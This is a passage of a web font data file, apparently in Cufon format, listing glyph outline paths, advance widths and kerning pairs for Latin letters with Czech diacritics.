4,13,-46,24r0,-36v38,-46,90,2,134,2v23,0,43,-21,46,-24r0,38v-9,9,-24,20,-49,20","w":209},{"d":"63,-3v1,56,-18,90,-79,85r-6,-33v41,1,49,-6,49,-56r0,-239r36,0r0,243","w":90,"k":{"e":7,"o":7,"\u00e9":7,"\u011b":7,"\u00f3":7,"u":7,"\u016f":7}},{"d":"146,-162r-86,132r86,0r0,30r-142,0r85,-132r-81,0r0,-30r138,0","w":150,"k":{",":-7,".":-7,"*":-22}},{"d":"57,-106v0,59,18,78,71,78v40,0,58,-19,63,-32v16,-43,4,-128,7,-186r35,0r0,140v0,24,1,59,-28,83v-49,41,-138,37,-169,-17v-33,-57,-8,-131,-14,-206r35,0r0,140xm128,-335v48,1,46,73,0,73v-22,0,-37,-18,-37,-37v0,-20,17,-36,37,-36xm128,-279v11,0,20,-9,20,-20v0,-11,-9,-20,-20,-20v-11,0,-20,9,-20,20v0,11,9,20,20,20","w":254,"k":{"A":9,"\u00c1":9,",":9,".":9}},{"d":"20,-108r0,-30r170,-72r0,31r-135,56r135,56r0,31","w":209},{"d":"73,-1v0,62,-14,89,-65,85r0,-27v35,1,36,-3,36,-61v0,-54,14,-66,37,-77v-37,-15,-37,-43,-37,-103v1,-34,-9,-35,-36,-35r0,-27v30,0,58,-5,65,49v6,43,-14,100,37,102r0,28v-36,1,-37,32,-37,66","w":119},{"d":"191,-107v30,0,55,25,55,55v0,30,-25,55,-55,55v-30,0,-55,-25,-55,-55v0,-30,25,-55,55,-55xm191,-23v16,0,28,-13,28,-29v0,-16,-12,-28,-28,-28v-16,0,-29,12,-29,28v0,16,13,29,29,29xm75,-248v30,0,55,24,55,54v0,30,-25,55,-55,55v-30,0,-54,-25,-54,-55v0,-30,24,-54,54,-54xm75,-165v16,0,28,-12,28,-28v0,-16,-12,-29,-28,-29v-16,0,-29,13,-29,29v0,16,13,28,29,28xm227,-249r-162,252r-27,0r162,-252r27,0","w":254},{"d":"211,-246r0,31r-85,0r0,215r-36,0r0,-215r-84,0r0,-31r205,0xm49,-319r22,0r38,34r38,-34r21,0r-33,57r-51,0","w":217,"k":{"g":41,"y":18,"\u00fd":18,"A":36,"\u00c1":36,"C":23,"\u010c":23,"G":23,"O":23,"Q":23,":":11,";":11,",":45,".":45,"v":22,"w":22,"e":41,"o":41,"\u00e9":23,"\u011b":23,"\u00f3":41,"u":31,"\u016f":27,"c":41,"\u010d":41,"d":41,"\u010f":41,"q":41,"r":31,"\u0159":31,"t":30,"\u0165":30,"a":45,"\u00e1":13,"-":61,"m":31,"n":31,"\u0148":24,"s":32,"\u0161":32,"x":24,"z":12,"\u017e":12}},{"d":"158,-162r-115,245r-35,0r55,-118r-63,-127r36,0r44,91r42,-91r36,0xm115,-235r-40,53r-20,0r24,-53r36,0","w":157,"k":{"g":7,",":29,".":29,"e":7,"o":7,"\u00e9":7,"\u011b":7,"\u00f3":7,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7,"f":-7,"*":-18}},{"d":"176,0v-26,-31,-58,-120,-113,-107r0,107r-35,0r0,-246r62,0v42,-3,80,30,80,69v0,28,-14,50,-41,60v37,27,55,75,88,117r-41,0xm134,-177v-2,-35,-29,-41,-71,-39r0,78v35,5,73,-9,71,-39","w":217,"k":{"y":18,"\u00fd":18,"C":22,"\u010c":22,"G":22,"O":22,"T":32,"\u0164":32,"V":29,"W":27,"Y":36,"\u00dd":36,"Q":22,"U":11,"\u00da":11,"\u016e":11,"v":20,"w":20,"e":13,"o":13,"\u00e9":13,"\u011b":13,"\u00f3":13,"u":9,"\u016f":9,"c":13,"\u010d":13,"d":14,"\u010f":14,"q":13}},{"d":"126,0v-5,-50,18,-140,-31,-140v-15,0,-27,8,-41,24r0,116r-32,0r0,-246r32,0r0,106v36,-46,104,-23,104,48r0,92r-32,0","k":{"y":5,"\u00fd":5,"v":5,"w":5}},{"d":"149,-29r0,20v-22,16,-46,19,-55,-4v-28,27,-84,19,-83,-23v1,-44,52,-46,83,-62v4,-54,-58,-42,-80,-10r0,-35v29,-36,112,-31,112,31r0,84v2,16,13,5,23,-1xm94,-33r0,-47v-27,9,-51,19,-51,38v1,28,36,28,51,9","w":153,"k":{"p":4,"y":12,"\u00fd":12,"v":13,"w":13,"o":7,"\u00f3":7,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7}},{"d":"57,-106v0,59,18,78,71,78v40,0,58,-19,63,-32v16,-43,4,-128,7,-186r35,0r0,140v0,24,1,59,-28,83v-49,41,-138,37,-169,-17v-33,-57,-8,-131,-14,-206r35,0r0,140xm128,-316r51,0r-59,54r-18,0","w":254,"k":{"A":9,"\u00c1":9,",":9,".":9}},{"d":"166,-162r-69,80r83,82r-43,0r-81,-82r72,-80r38,0xm55,-246r0,246r-33,0r0,-246r33,0","w":172,"k":{",":-4,".":-4,"e":11,"o":11,"\u00e9":11,"\u011b":11,"\u00f3":11,"c":11,"\u010d":11,"d":11,"\u010f":11,"q":11,"*":-7}},{"d":"90,-38r0,-70r-70,0r0,-30r70,0r0,-70r30,0r0,70r70,0r0,30r-70,0r0,70r-30,0","w":209},{"d":"91,-41v-8,-33,-82,-41,-75,-82v-7,-45,77,-49,100,-29r0,32v-18,-11,-32,-17,-47,-17v-15,0,-20,8,-20,14v2,23,84,44,75,81v0,15,-11,45,-55,45v-23,0,-38,-7,-54,-15r0,-34v23,16,42,21,51,21v10,0,25,-5,25,-16xm126,-237r-40,55r-33,0r-39,-55v32,-3,38,20,56,31v18,-11,23,-35,56,-31","w":138,"k":{"w":4}},{"d":"27,-246v72,-2,146,-4,147,64v0,21,-10,40,-38,52v36,7,59,32,59,63v0,40,-33,57,-48,62v-27,9,-82,3,-120,5r0,-246xm138,-179v2,-36,-38,-37,-76,-35r0,74v39,0,74,2,76,-39xm159,-70v0,-34,-49,-44,-97,-39r0,78v47,4,97,-2,97,-39","w":202,"k":{"V":11,"A":-2,"\u00c1":-2,"W":11,"Y":14,"\u00dd":14}},{"d":"180,-176v0,37,-33,78,-94,69r-26,0r0,107r-35,0r0,-246v78,-2,155,-7,155,70xm144,-177v0,-37,-39,-42,-84,-38r0,77v43,2,84,2,84,-39","w":183,"k":{"y":-7,"\u00fd":-7,"A":25,"\u00c1":25,",":54,".":54,"e":9,"o":9,"\u00e9":9,"\u011b":9,"\u00f3":9,"c":9,"\u010d":9,"d":9,"\u010f":9,"q":9,"f":-7}},{"d":"90,3v-81,1,-104,-94,-44,-128v-10,-8,-29,-24,-29,-55v0,-40,35,-69,75,-69v66,0,102,88,42,124v10,6,34,21,34,58v0,38,-30,70,-78,70xm130,-179v0,-18,-13,-36,-39,-36v-22,0,-39,14,-39,36v0,51,76,48,78,0xm91,-31v56,-1,57,-76,-1,-77v-60,3,-57,76,1,77"},{"d":"255,-246r0,246r-35,0r0,-191r-76,95r-6,0r-76,-95r0,191r-36,0r0,-246r33,0r82,101r81,-101r33,0","w":281},{"d":"115,-246r0,30r-49,0r0,267r49,0r0,29r-84,0r0,-326r84,0","w":119},{"d":"217,-246r-90,116r0,130r-36,0r0,-130r-91,-116r42,0r66,85r67,-85r42,0xm120,-316r51,0r-59,54r-18,0","w":217,"k":{"g":41,"p":31,"y":18,"\u00fd":18,"A":40,"\u00c1":40,"C":29,"\u010c":29,"G":29,"O":29,"S":7,"\u0160":7,"Q":29,":":11,";":11,",":36,".":36,"v":18,"w":18,"e":50,"o":50,"\u00e9":40,"\u011b":40,"\u00f3":50,"u":32,"\u016f":32,"c":50,"\u010d":50,"d":50,"\u010f":50,"q":50,"r":31,"\u0159":31,"t":32,"\u0165":32,"a":43,"\u00e1":22,"-":54,"m":31,"n":31,"\u0148":27,"s":35,"\u0161":35,"x":15,"z":21,"\u017e":21,")":-7,"]":-7,"}":-7,"i":14,"\u00ed":14}},{"d":"236,-229r0,38v-26,-15,-55,-24,-85,-24v-59,0,-97,44,-97,93v0,46,33,92,98,92v31,0,61,-10,87,-27r0,39v-28,15,-59,21,-90,21v-91,0,-132,-68,-132,-125v0,-68,55,-127,133,-127v38,0,70,13,86,20xm80,-319r23,0r37,34r38,-34r22,0r-34,57r-51,0","w":254,"k":{"A":-5,"\u00c1":-5,"S":-4,"\u0160":-4,",":-9,".":-9}},{"d":"226,-246r-157,215r157,0r0,31r-222,0r158,-215r-148,0r0,-31r212,0xm57,-319r22,0r37,34r38,-34r22,0r-34,57r-51,0","w":232,"k":{"C":11,"\u010c":11,"G":11,"O":11,"Q":7}},{"d":"163,-246r0,246r-69,0v-63,0,-78,-53,-78,-84v-1,-67,62,-95,114,-74r0,-88r33,0xm48,-80v2,52,31,55,82,53r0,-103v-33,-18,-84,-5,-82,50xm184,-160v5,-18,18,-25,15,-42v-19,-6,-19,-20,-19,-23v0,-13,10,-24,22,-24v15,0,24,16,24,34v0,4,0,42,-42,55","w":213,"k":{"d":4,"\u010f":4}},{"d":"58,-235r24,53r-20,0r-40,-53r36,0","w":119},{"d":"190,-69r-170,0r0,-29r170,0r0,29xm190,-147r-170,0r0,-30r170,0r0,30","w":209},{"d":"55,-246r0,246r-32,0r0,-246r32,0","w":78,"k":{"y":4,"\u00fd":4,"w":4}},{"d":"146,-162r-86,132r86,0r0,30r-142,0r85,-132r-81,0r0,-30r138,0xm132,-237r-40,55r-33,0r-40,-55v33,-3,38,20,57,31v18,-11,23,-35,56,-31","w":150,"k":{",":-7,".":-7,"*":-22}},{"d":"235,-246r0,246r-35,0r0,-107r-138,0r0,107r-35,0r0,-246r35,0r0,107r138,0r0,-107r35,0","w":262},{"d":"256,-246r0,246r-31,0r-164,-189r0,189r-33,0r0,-246r29,0r165,191r0,-191r34,0xm81,-319r22,0r37,34r38,-34r22,0r-34,57r-51,0","w":281},{"d":"166,-246r0,32r-104,0r0,75r101,0r0,31r-101,0r0,76r108,0r0,32r-143,0r0,-246r139,0xm36,-319r22,0r37,34r38,-34r22,0r-34,57r-51,0","w":187,"k":{"J":-4}},{"d":"126,0v-6,-52,20,-136,-33,-138v-15,0,-28,8,-38,22r0,116r-33,0r0,-162r33,0r0,21v40,-43,103,-29,103,49r0,92r-32,0xm147,-237r-40,55r-33,0r-39,-55v32,-3,38,20,56,31v18,-11,23,-35,56,-31","k":{"y":5,"\u00fd":5,"v":5,"w":5,"u":4,"\u016f":4}},{"d":"15,-148r56,0r14,-70r26,0r-14,70r70,0r14,-70r26,0r-15,70r33,0r0,25r-38,0r-13,61r51,0r0,26r-56,0r-15,69r-25,0r14,-69r-70,0r-14,69r-26,0r15,-69r-33,0r0,-26r38,0r13,-61r-51,0r0,-25xm161,-123r-70,0r-13,61r71,0","w":240},{"d":"-2,27r184,0r0,18r-184,0r0,-18"},{"d":"55,-162r0,162r-32,0r0,-162r32,0xm76,-235r-40,53r-20,0r24,-53r36,0","w":78},{"d":"26,-162v-3,-66,26,-95,81,-84r0,32v-4,-1,-7,-3,-15,-3v-37,2,-34,30,-34,55r29,0r0,29r-29,0r0,133r-32,0r0,-133r-23,0r0,-29r23,0","w":93,"k":{"v":-4,"q":7,"?":-11,"*":-32,"!":-18,"g":5,"h":-7,"k":-7,"y":-2,"\u00fd":-2,"w":-4,"e":7,"o":9,"\u00e9":7,"\u011b":7,"\u00f3":9,"c":7,"\u010d":7,"d":7,"\u010f":7,"t":-4,"\u0165":-4,"f":-5,"\u00e1":-5,")":-36,"]":-36,"}":-36,"i":4,"\u00ed":4,"j":-2,"b":-7,"l":-7}},{"d":"130,-247r110,247r-36,0r-33,-72r-104,0r-31,72r-36,0r105,-247r25,0xm81,-104r76,0r-40,-89xm120,-316r52,0r-59,54r-19,0","w":240,"k":{"y":16,"\u00fd":16,"C":14,"\u010c":14,"G":14,"O":14,"S":-4,"\u0160":-4,"T":36,"\u0164":36,"V":29,"W":29,"Y":40,"\u00dd":40,"Q":14,"U":7,"\u00da":7,"\u016e":7,":":-14,";":-14,",":-14,".":-14,"v":18,"w":18}},{"d":"63,-246r0,246r-36,0r0,-246r36,0xm45,-316r52,0r-59,54r-19,0","w":90},{"d":"21,-162v50,3,67,-14,113,14v85,52,8,182,-81,144r0,87r-32,0r0,-245xm135,-81v-7,-61,-44,-49,-82,-51r0,100v46,21,78,-2,82,-49","k":{"x":9,"v":7,"y":7,"\u00fd":7,",":11,".":11,"w":7}},{"d":"236,-229r0,38v-26,-15,-55,-24,-85,-24v-59,0,-97,44,-97,93v0,46,33,92,98,92v31,0,61,-10,87,-27r0,39v-28,15,-59,21,-90,21v-91,0,-132,-68,-132,-125v0,-68,55,-127,133,-127v38,0,70,13,86,20","w":254,"k":{"A":-5,"\u00c1":-5,"S":-4,"\u0160":-4,",":-9,".":-9}},{"d":"100,-165v48,0,86,34,86,85v0,58,-47,83,-87,83v-52,0,-86,-38,-86,-84v0,-45,33,-84,87,-84xm153,-81v0,-77,-108,-72,-107,0v0,41,30,55,54,55v32,0,53,-22,53,-55xm136,-235r-40,53r-20,0r24,-53r36,0","w":198,"k":{"y":7,"\u00fd":7,",":11,".":11,"v":7,"w":7,"x":9}},{"d":"3,3r70,-252r26,0r-71,252r-25,0","w":101},{"d":"156,-162r-71,165r-11,0r-73,-165r35,0r44,100r42,-100r34,0","w":157,"k":{"q":7,"*":-18,"g":7,",":22,".":22,"e":5,"o":7,"\u00e9":5,"\u011b":5,"\u00f3":7,"d":7,"\u010f":7,"f":-7}},{"d":"145,-246r0,32r-77,0r0,62v55,-3,90,30,90,76v0,66,-82,101,-140,64r0,-36v26,17,48,17,52,17v30,0,52,-19,52,-45v0,-46,-48,-50,-86,-42r0,-128r109,0"},{"w":100},{"d":"231,-150r6,-28r32,0r-31,146v0,8,8,11,12,11v19,0,68,-37,68,-97v0,-66,-57,-111,-126,-111v-92,0,-146,71,-146,151v0,104,79,135,151,135v77,0,112,-35,124,-53r31,0v-5,10,-43,80,-155,80v-127,0,-178,-76,-178,-159v0,-68,41,-180,175,-180v98,0,150,69,150,137v0,60,-38,98,-62,113v-8,5,-24,13,-44,13v-31,0,-33,-18,-34,-29v-8,9,-28,29,-54,29v-37,0,-64,-35,-64,-79v1,-74,86,-163,145,-79xm180,-157v-62,0,-86,139,-23,139v32,0,64,-42,64,-89v0,-33,-19,-50,-41,-50","w":363},{"d":"73,3r-70,-252r25,0r71,252r-26,0","w":101},{"d":"149,-29r0,20v-22,16,-46,19,-55,-4v-28,27,-84,19,-83,-23v1,-44,52,-46,83,-62v4,-54,-58,-42,-80,-10r0,-35v29,-36,112,-31,112,31r0,84v2,16,13,5,23,-1xm94,-33r0,-47v-27,9,-51,19,-51,38v1,28,36,28,51,9xm107,-235r-39,53r-20,0r24,-53r35,0","w":153,"k":{"p":4,"y":12,"\u00fd":12,"v":13,"w":13,"o":7,"\u00f3":7,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7}},{"d":"158,-162r-115,245r-35,0r55,-118r-63,-127r36,0r44,91r42,-91r36,0","w":157,"k":{"g":7,",":29,".":29,"e":7,"o":7,"\u00e9":7,"\u011b":7,"\u00f3":7,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7,"f":-7,"*":-18}},{"d":"42,-105r-33,0r63,-141r25,0r62,141r-32,0r-43,-105","w":168},{"d":"114,-249r21,27v-57,36,-69,73,-75,90v58,-29,107,5,107,61v0,42,-32,74,-73,74v-31,0,-78,-20,-78,-88v0,-64,50,-136,98,-164xm90,-109v-24,0,-40,4,-39,32v1,60,82,63,82,7v0,-29,-24,-39,-43,-39"},{"d":"38,-40v11,0,21,9,21,22v0,12,-9,21,-21,21v-12,0,-21,-9,-21,-21v0,-13,10,-22,21,-22xm19,-143v0,-30,43,-28,43,0v0,12,-9,21,-21,21v-12,0,-22,-9,-22,-21","w":78},{"d":"125,-21v-41,43,-103,30,-103,-48r0,-93r32,0r0,93v0,18,0,46,33,46v15,0,28,-9,38,-23r0,-116r33,0r0,162r-33,0r0,-21"},{"d":"67,3r-21,-26v17,-10,62,-43,75,-92v-48,31,-108,-9,-108,-61v0,-36,28,-73,73,-73v49,0,80,40,80,90v0,61,-43,127,-99,162xm127,-150v6,-31,-1,-66,-40,-66v-30,0,-39,25,-39,40v10,42,39,53,79,26"},{"w":100},{"d":"33,84r0,-330r27,0r0,330r-27,0","w":93},{"d":"29,-96v-6,-24,41,-69,39,-97v-2,-31,-30,-24,-45,-18r23,-38v27,-5,65,29,58,52v3,51,-52,80,-53,134v-8,-4,-22,-10,-22,-33xm77,-18v0,13,-10,21,-22,21v-11,0,-21,-8,-21,-21v0,-28,41,-30,43,0","w":119},{"d":"130,-247r110,247r-36,0r-33,-72r-104,0r-31,72r-36,0r105,-247r25,0xm81,-104r76,0r-40,-89","w":240,"k":{"y":16,"\u00fd":16,"C":14,"\u010c":14,"G":14,"O":14,"S":-4,"\u0160":-4,"T":36,"\u0164":36,"V":29,"W":29,"Y":40,"\u00dd":40,"Q":14,"U":7,"\u00da":7,"\u016e":7,":":-14,";":-14,",":-14,".":-14,"v":18,"w":18}},{"d":"148,-249v82,0,132,60,132,126v0,71,-54,126,-134,126v-77,0,-130,-57,-130,-125v0,-65,48,-127,132,-127xm148,-30v52,0,96,-42,96,-93v0,-41,-31,-93,-95,-93v-69,0,-96,53,-96,94v0,56,44,92,95,92","w":296,"k":{"A":14,"\u00c1":14,"T":23,"\u0164":23,"V":14,"W":14,"Y":29,"\u00dd":29,"Z":18,"\u017d":18,",":22,".":22,"X":23}},{"d":"158,-47r0,31v-22,16,-87,34,-119,-3v-51,-58,-18,-147,51,-146v46,0,72,38,71,87r-114,0v1,24,17,51,52,51v21,0,42,-7,59,-20xm48,-97r81,0v0,-6,-3,-40,-39,-40v-18,0,-44,22,-42,40","w":172,"k":{"y":5,"\u00fd":5,",":-7,".":-7,"v":5,"w":5}},{"d":"63,-246r0,246r-36,0r0,-246r36,0","w":90},{"d":"91,-41v-8,-33,-82,-41,-75,-82v-7,-45,77,-49,100,-29r0,32v-18,-11,-32,-17,-47,-17v-15,0,-20,8,-20,14v2,23,84,44,75,81v0,15,-11,45,-55,45v-23,0,-38,-7,-54,-15r0,-34v23,16,42,21,51,21v10,0,25,-5,25,-16","w":138,"k":{"w":4}},{"d":"125,-21v-41,43,-103,30,-103,-48r0,-93r32,0r0,93v0,18,0,46,33,46v15,0,28,-9,38,-23r0,-116r33,0r0,162r-33,0r0,-21xm57,-215v0,-42,66,-46,66,-1v0,19,-15,34,-33,34v-18,0,-33,-14,-33,-33xm90,-234v-12,0,-20,7,-20,19v0,12,8,20,20,20v11,0,21,-9,21,-20v0,-12,-10,-19,-21,-19"},{"d":"24,-154v-5,-28,-10,-57,-8,-92r36,0v2,35,-3,64,-8,92r-20,0","w":67},{"d":"49,-41v29,1,29,44,0,44v-11,0,-22,-8,-22,-21v0,-12,8,-23,22,-23xm49,-249v19,0,20,36,20,50v-3,56,-4,98,-20,128v-9,0,-20,-84,-20,-126v0,-10,0,-52,20,-52","w":97},{"d":"60,-133v3,38,-13,108,23,107v6,0,19,0,37,-11r0,29v-36,15,-57,18,-84,-9v-15,-30,-5,-75,-8,-116r-28,0v16,-25,41,-40,60,-62r0,33r51,0r0,29r-51,0xm125,-160v5,-18,17,-25,14,-42v-18,-6,-18,-20,-18,-23v0,-13,10,-24,22,-24v15,0,24,16,24,34v0,4,0,42,-42,55","w":158,"k":{"e":4,"o":4,"\u00e9":4,"\u011b":4,"\u00f3":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"a":-7,"\u00e1":-7,"j":-7,"*":-11}},{"d":"25,-154v-5,-28,-10,-57,-8,-92r36,0v2,35,-3,64,-9,92r-19,0xm83,-154v-5,-28,-10,-57,-8,-92r36,0v2,35,-3,64,-8,92r-20,0","w":127},{"d":"27,-246v75,4,120,-15,179,26v28,19,47,55,47,97v0,62,-44,96,-59,105v-54,29,-100,14,-167,18r0,-246xm217,-125v0,-47,-47,-97,-110,-89r-45,0r0,182v86,9,155,-16,155,-93","w":270,"k":{"A":20,"\u00c1":20,"T":25,"\u0164":25,"V":16,"W":16,"Y":31,"\u00dd":31,"Z":18,"\u017d":18,",":27,".":27,"X":25}},{"d":"39,-39v11,0,22,8,22,21v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21v0,-13,10,-21,21,-21","w":78},{"d":"190,-137r0,29r-170,72r0,-31r135,-55r-135,-57r0,-31","w":209},{"d":"159,-162r0,245r-32,0r0,-86v-55,20,-116,-12,-114,-76v0,-31,16,-83,86,-83r60,0xm127,-132v-49,0,-82,-1,-82,52v0,43,38,70,82,49r0,-101","k":{"*":-7,"y":-4,"\u00fd":-4,")":-11,"]":-11,"}":-11}},{"d":"92,83v-41,-47,-69,-98,-69,-166v0,-79,40,-129,69,-166r20,0v-22,33,-52,77,-52,167v0,59,16,118,52,165r-20,0","w":116},{"d":"91,-249v44,0,78,52,78,126v0,78,-34,126,-79,126v-46,0,-79,-48,-79,-126v0,-84,40,-126,80,-126xm90,-215v-21,0,-44,25,-44,92v0,76,26,93,44,93v19,0,44,-19,44,-92v0,-84,-34,-93,-44,-93"},{"d":"142,-249r0,138r28,0r0,30r-28,0r0,81r-34,0r0,-81r-104,0r0,-15r124,-153r14,0xm108,-111r0,-71r-57,71r57,0"},{"d":"169,-215r0,41v-15,-16,-36,-26,-53,-30r0,71v43,12,65,40,65,68v0,25,-13,60,-65,69r0,38r-30,0r0,-38v-25,-3,-49,-14,-68,-26r0,-44v32,29,53,34,68,37r0,-78v-53,-15,-67,-42,-67,-65v0,-26,20,-59,67,-64r0,-13r30,0r0,13v23,4,41,11,53,21xm86,-142r0,-62v-44,9,-41,52,0,62xm116,-95r0,65v43,-8,34,-55,0,-65","w":195},{"d":"166,-246r0,32r-104,0r0,75r101,0r0,31r-101,0r0,76r108,0r0,32r-143,0r0,-246r139,0xm105,-316r51,0r-59,54r-19,0","w":187,"k":{"J":-4}},{"d":"226,-246r-157,215r157,0r0,31r-222,0r158,-215r-148,0r0,-31r212,0","w":232,"k":{"C":11,"\u010c":11,"G":11,"O":11,"Q":7}},{"d":"176,-246r-111,249r-31,-13r90,-202r-106,0r0,-34r158,0"},{"d":"140,-154r0,34v-9,-6,-24,-15,-45,-15v-65,0,-69,109,7,108v17,0,30,-6,42,-11r0,32v-7,3,-24,9,-47,9v-56,0,-83,-39,-83,-83v0,-39,22,-85,80,-85v21,0,33,6,46,11xm144,-237r-40,55r-33,0r-39,-55v32,-3,38,20,56,31v18,-11,23,-35,56,-31","w":157,"k":{",":-7,".":-7}},{"d":"102,-97r0,34r-88,0r0,-34r88,0","w":116},{"d":"163,-246r0,246r-69,0v-63,0,-78,-53,-78,-84v-1,-67,61,-95,114,-74r0,-88r33,0xm48,-80v2,52,31,55,82,53r0,-103v-33,-18,-84,-5,-82,50","w":183,"k":{"d":4,"\u010f":4}},{"d":"18,43r0,-7v12,-12,13,-22,14,-36v-19,-6,-18,-20,-18,-23v0,-12,9,-23,21,-23v15,0,25,16,25,33v0,4,0,43,-42,56","w":78,"k":{"A":-14,"\u00c1":-14,"C":11,"\u010c":11,"G":11,"J":-11,"O":11,"S":-4,"\u0160":-4,"T":22,"\u0164":22,"V":40,"W":25,"Y":40,"\u00dd":40,"Z":-11,"\u017d":-11}},{"d":"100,-165v48,0,86,34,86,85v0,58,-47,83,-87,83v-52,0,-86,-38,-86,-84v0,-45,33,-84,87,-84xm153,-81v0,-77,-108,-72,-107,0v0,41,30,55,54,55v32,0,53,-22,53,-55","w":198,"k":{"y":7,"\u00fd":7,",":11,".":11,"v":7,"w":7,"x":9}},{"d":"62,-246r0,214r111,0r0,32r-146,0r0,-246r35,0","w":176,"k":{"y":11,"\u00fd":11,"C":20,"\u010c":20,"G":20,"O":20,"T":36,"\u0164":36,"V":36,"W":36,"Y":40,"\u00dd":40,"Q":20}},{"d":"210,-246r-107,117r133,129r-48,0r-125,-121r0,121r-36,0r0,-246r36,0r0,113r103,-113r44,0","w":236,"k":{"y":27,"\u00fd":27,"C":36,"\u010c":36,"G":36,"O":36,"S":7,"\u0160":7,"T":17,"\u0164":17,"V":14,"W":17,"Y":17,"\u00dd":17,"Q":36,"U":20,"\u00da":20,"\u016e":20,"v":36,"w":32,"e":22,"o":22,"\u00e9":22,"\u011b":22,"\u00f3":22,"u":18,"\u016f":18,"c":22,"\u010d":22,"d":22,"\u010f":22,"q":22,"r":15,"\u0159":15,"t":21,"\u0165":21}},{"d":"140,-154r0,34v-9,-6,-24,-15,-45,-15v-65,0,-69,109,7,108v17,0,30,-6,42,-11r0,32v-7,3,-24,9,-47,9v-56,0,-83,-39,-83,-83v0,-39,22,-85,80,-85v21,0,33,6,46,11","w":157,"k":{",":-7,".":-7}},{"d":"217,-246r-103,247r-8,0r-106,-247r35,0r74,173r74,-173r34,0","w":217,"k":{"v":9,"q":36,"p":18,"m":18,"Q":14,"-":36,"g":27,"y":9,"\u00fd":9,"A":29,"\u00c1":29,"C":14,"\u010c":14,"G":14,"O":14,",":36,".":36,"w":9,"e":36,"o":36,"\u00e9":29,"\u011b":29,"\u00f3":36,"u":18,"\u016f":18,"c":36,"\u010d":36,"d":36,"\u010f":36,"r":18,"\u0159":18,"t":14,"\u0165":14,"a":22,"\u00e1":14,"n":18,"\u0148":18,"s":24,"\u0161":24,"z":14,"\u017e":14,")":-11,"]":-11,"}":-11}},{"d":"150,-33v-38,44,-140,55,-140,-21v0,-24,14,-48,58,-73v-34,-28,-46,-113,34,-114v44,0,61,32,61,55v0,33,-31,54,-46,64r35,40v5,-6,14,-17,26,-40r35,0v-12,31,-30,53,-39,64r49,58r-45,0xm45,-56v4,41,67,23,83,-2r-40,-46v-16,12,-45,27,-43,48xm98,-146v23,-14,32,-27,32,-40v0,-14,-12,-25,-28,-25v-15,0,-27,10,-27,23v0,20,20,40,23,42","w":225},{"d":"120,-60v-15,-66,-105,-55,-105,-124v0,-61,83,-84,129,-47r0,39v-21,-20,-41,-25,-58,-25v-24,0,-39,13,-39,28v0,41,106,56,106,125v0,68,-92,85,-137,45r0,-45v7,9,29,36,66,36v18,0,38,-11,38,-32xm23,-319r22,0r37,34r38,-34r22,0r-34,57r-51,0","w":164,"k":{"y":11,"\u00fd":11,"v":11,"w":11}},{"d":"166,-246r0,32r-104,0r0,75r101,0r0,31r-101,0r0,76r108,0r0,32r-143,0r0,-246r139,0","w":187,"k":{"J":-4}},{"d":"57,-106v0,59,18,78,71,78v40,0,58,-19,63,-32v16,-43,4,-128,7,-186r35,0r0,140v0,24,1,59,-28,83v-49,41,-138,37,-169,-17v-33,-57,-8,-131,-14,-206r35,0r0,140","w":254,"k":{"A":9,"\u00c1":9,",":9,".":9}},{"d":"60,-133v3,38,-13,108,23,107v6,0,19,0,37,-11r0,29v-36,15,-57,18,-84,-9v-15,-30,-5,-75,-8,-116r-28,0v16,-25,41,-40,60,-62r0,33r51,0r0,29r-51,0","w":124,"k":{"e":4,"o":4,"\u00e9":4,"\u011b":4,"\u00f3":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"a":-7,"\u00e1":-7,"j":-7,"*":-11}},{"d":"158,-246r0,32r-95,0r0,68r95,0r0,32r-95,0r0,114r-36,0r0,-246r131,0","w":168,"k":{"A":21,"\u00c1":21,",":50,".":50,"e":5,"o":5,"\u00e9":5,"\u011b":5,"\u00f3":5}},{"d":"158,-47r0,31v-22,16,-87,34,-119,-3v-51,-58,-18,-147,51,-146v46,0,72,38,71,87r-114,0v1,24,17,51,52,51v21,0,42,-7,59,-20xm48,-97r81,0v0,-6,-3,-40,-39,-40v-18,0,-44,22,-42,40xm148,-237r-40,55r-33,0r-39,-55v32,-3,38,20,56,31v18,-11,23,-35,56,-31","w":172,"k":{"y":5,"\u00fd":5,",":-7,".":-7,"v":5,"w":5}},{"d":"5,80r0,-29r49,0r0,-268r-49,0r0,-29r84,0r0,326r-84,0","w":119},{"d":"108,-246r0,246r-35,0r0,-246r35,0"},{"d":"242,-121r0,104v-19,8,-49,20,-90,20v-188,-4,-170,-250,-1,-252v35,0,60,10,86,21r0,36v-40,-23,-73,-25,-87,-25v-49,0,-95,36,-95,94v0,74,78,117,152,84r0,-51r-47,0r0,-31r82,0","w":266,"k":{"B":4}},{"d":"247,-246r-98,119r105,127r-42,0r-84,-102r-84,102r-43,0r106,-127r-99,-119r43,0r77,94r77,-94r42,0","w":254,"k":{"v":25,"q":11,"Q":23,"y":25,"\u00fd":25,"C":23,"\u010c":23,"G":23,"O":23,"w":25,"e":11,"o":11,"\u00e9":11,"\u011b":11,"\u00f3":11,"u":7,"\u016f":7,"c":11,"\u010d":11,"d":11,"\u010f":11,")":-4,"]":-4,"}":-4}},{"d":"256,-246r0,246r-31,0r-164,-189r0,189r-33,0r0,-246r29,0r165,191r0,-191r34,0","w":281},{"d":"12,0v32,-55,93,-95,103,-168v-9,-68,-71,-52,-98,-13r0,-44v12,-9,32,-24,60,-24v42,0,73,32,73,76v0,47,-33,86,-76,139r94,0r0,34r-156,0"},{"d":"85,-190v17,-13,24,-29,47,-38v17,5,16,26,-6,29r-39,14v1,2,1,7,0,9v21,10,47,6,57,31v0,23,-29,6,-32,0r-27,-26v-1,2,-4,3,-7,3v3,19,9,32,9,54v0,25,-26,16,-24,0v1,-19,8,-35,10,-54v-3,0,-4,0,-7,-3v-13,10,-31,37,-48,37v-9,0,-12,-8,-12,-11v6,-21,38,-22,57,-31r0,-9v-17,-9,-51,-12,-56,-30v1,-17,21,-14,28,-4r31,29v3,-3,4,-4,7,-4r-10,-52v0,-2,1,-15,13,-15v26,10,1,42,2,67v3,0,6,2,7,4","w":150},{"d":"211,-246r0,31r-85,0r0,215r-36,0r0,-215r-84,0r0,-31r205,0","w":217,"k":{"g":41,"y":18,"\u00fd":18,"A":36,"\u00c1":36,"C":23,"\u010c":23,"G":23,"O":23,"Q":23,":":11,";